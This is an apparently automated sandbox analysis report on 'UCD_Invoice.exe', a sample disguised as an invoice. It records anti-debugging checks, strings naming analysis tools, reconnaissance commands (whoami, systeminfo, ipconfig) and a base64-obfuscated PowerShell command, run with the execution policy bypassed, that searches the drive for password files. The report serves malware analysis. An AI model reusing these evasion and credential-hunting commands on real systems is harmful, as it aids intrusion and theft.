Code function: 0_2_0083EE56 mov eax, dword ptr fs:[00000030h] |
0_2_0083EE56 |
Source: C:\Users\user\Desktop\UCD_Invoice.exe |
Code function: 0_2_00808CD9 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, |
0_2_00808CD9 |
Source: C:\Users\user\Desktop\UCD_Invoice.exe |
Code function: 0_2_008096F3 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
0_2_008096F3 |
Source: C:\Users\user\Desktop\UCD_Invoice.exe |
Code function: 0_2_00835772 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
0_2_00835772 |
Source: C:\Users\user\Desktop\UCD_Invoice.exe |
Code function: 0_2_00803E9A SetUnhandledExceptionFilter, |
0_2_00803E9A |
Source: C:\Users\user\Desktop\UCD_Invoice.exe |
Process created: C:\Windows\SysWOW64\whoami.exe whoami |
Jump to behavior |
Source: C:\Users\user\Desktop\UCD_Invoice.exe |
Process created: C:\Windows\SysWOW64\systeminfo.exe systeminfo |
Jump to behavior |
Source: C:\Users\user\Desktop\UCD_Invoice.exe |
Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /all |
Jump to behavior |
Source: C:\Users\user\Desktop\UCD_Invoice.exe |
Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell.exe -ExecutionPolicy Bypass -Command "Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('R2V0LUNoaWxkSXRlbSAtUGF0aCAnQzpcXCcgLUZpbHRlciAncGFzc3dvcmQudHh0JyAtUmVjdXJzZSAyPm51bGwgfCBTZWxlY3QtT2JqZWN0IC1FeHBhbmRQcm9wZXJ0eSBGdWxsTmFtZQ==')))" |
Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -Command "Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('R2V0LUNoaWxkSXRlbSAtUGF0aCAnQzpcXCcgLUZpbHRlciAncGFzc3dvcmQudHh0JyAtUmVjdXJzZSAyPm51bGwgfCBTZWxlY3QtT2JqZWN0IC1FeHBhbmRQcm9wZXJ0eSBGdWxsTmFtZQ==')))" |
Jump to behavior |
Source: C:\Users\user\Desktop\UCD_Invoice.exe |
Process created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /c powershell.exe -executionpolicy bypass -command "invoke-expression ([system.text.encoding]::utf8.getstring([system.convert]::frombase64string('r2v0lunoawxksxrlbsatugf0acanqzpcxccgluzpbhrlciancgfzc3dvcmqudhh0jyatumvjdxjzzsaypm51bgwgfcbtzwxly3qtt2jqzwn0ic1fehbhbmrqcm9wzxj0esbgdwxstmftzq==')))" |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -executionpolicy bypass -command "invoke-expression ([system.text.encoding]::utf8.getstring([system.convert]::frombase64string('r2v0lunoawxksxrlbsatugf0acanqzpcxccgluzpbhrlciancgfzc3dvcmqudhh0jyatumvjdxjzzsaypm51bgwgfcbtzwxly3qtt2jqzwn0ic1fehbhbmrqcm9wzxj0esbgdwxstmftzq==')))" |
|
Source: C:\Users\user\Desktop\UCD_Invoice.exe |
Process created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /c powershell.exe -executionpolicy bypass -command "invoke-expression ([system.text.encoding]::utf8.getstring([system.convert]::frombase64string('r2v0lunoawxksxrlbsatugf0acanqzpcxccgluzpbhrlciancgfzc3dvcmqudhh0jyatumvjdxjzzsaypm51bgwgfcbtzwxly3qtt2jqzwn0ic1fehbhbmrqcm9wzxj0esbgdwxstmftzq==')))" |
Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -executionpolicy bypass -command "invoke-expression ([system.text.encoding]::utf8.getstring([system.convert]::frombase64string('r2v0lunoawxksxrlbsatugf0acanqzpcxccgluzpbhrlciancgfzc3dvcmqudhh0jyatumvjdxjzzsaypm51bgwgfcbtzwxly3qtt2jqzwn0ic1fehbhbmrqcm9wzxj0esbgdwxstmftzq==')))" |
Jump to behavior |
Source: C:\Users\user\Desktop\UCD_Invoice.exe |
Code function: GetACP,IsValidCodePage,GetLocaleInfoW, |
0_2_008457E8 |
Source: C:\Users\user\Desktop\UCD_Invoice.exe |
Code function: EnumSystemLocalesW, |
0_2_00845BB9 |
Source: C:\Users\user\Desktop\UCD_Invoice.exe |
Code function: EnumSystemLocalesW, |
0_2_00845B37 |
Source: C:\Users\user\Desktop\UCD_Invoice.exe |
Code function: EnumSystemLocalesW, |
0_2_00835CC1 |
Source: C:\Users\user\Desktop\UCD_Invoice.exe |
Code function: EnumSystemLocalesW, |
0_2_00845C7A |
Source: C:\Users\user\Desktop\UCD_Invoice.exe |
Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, |
0_2_00845D27 |
Source: C:\Users\user\Desktop\UCD_Invoice.exe |
Code function: EnumSystemLocalesW, |
0_2_00835E8B |
Source: C:\Users\user\Desktop\UCD_Invoice.exe |
Code function: EnumSystemLocalesW, |
0_2_00835E08 |
Source: C:\Users\user\Desktop\UCD_Invoice.exe |
Code function: GetLocaleInfoW, |
0_2_00846011 |
Source: C:\Users\user\Desktop\UCD_Invoice.exe |
Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, |
0_2_00846182 |
Source: C:\Users\user\Desktop\UCD_Invoice.exe |
Code function: GetLocaleInfoW, |
0_2_008462CB |
Source: C:\Users\user\Desktop\UCD_Invoice.exe |
Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, |
0_2_008463D2 |
Source: C:\Users\user\Desktop\UCD_Invoice.exe |
Code function: GetLocaleInfoW, |
0_2_008369E6 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\ VolumeInformation |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation |
Jump to behavior |
Source: UCD_Invoice.exe, UCD_Invoice.exe, 00000000.00000000.1616190477.000000000086D000.00000008.00000001.01000000.00000003.sdmp, UCD_Invoice.exe, 00000000.00000002.2874028334.000000000086D000.00000004.00000001.01000000.00000003.sdmp |
Binary or memory string: procmon.exe |
Source: UCD_Invoice.exe, UCD_Invoice.exe, 00000000.00000000.1616190477.000000000086D000.00000008.00000001.01000000.00000003.sdmp, UCD_Invoice.exe, 00000000.00000002.2874028334.000000000086D000.00000004.00000001.01000000.00000003.sdmp |
Binary or memory string: wireshark.exe |
Source: UCD_Invoice.exe, UCD_Invoice.exe, 00000000.00000000.1616190477.000000000086D000.00000008.00000001.01000000.00000003.sdmp, UCD_Invoice.exe, 00000000.00000002.2874028334.000000000086D000.00000004.00000001.01000000.00000003.sdmp |
Binary or memory string: procexp.exe |
Source: UCD_Invoice.exe, UCD_Invoice.exe, 00000000.00000000.1616190477.000000000086D000.00000008.00000001.01000000.00000003.sdmp, UCD_Invoice.exe, 00000000.00000002.2874028334.000000000086D000.00000004.00000001.01000000.00000003.sdmp |
Binary or memory string: ollydbg.exe |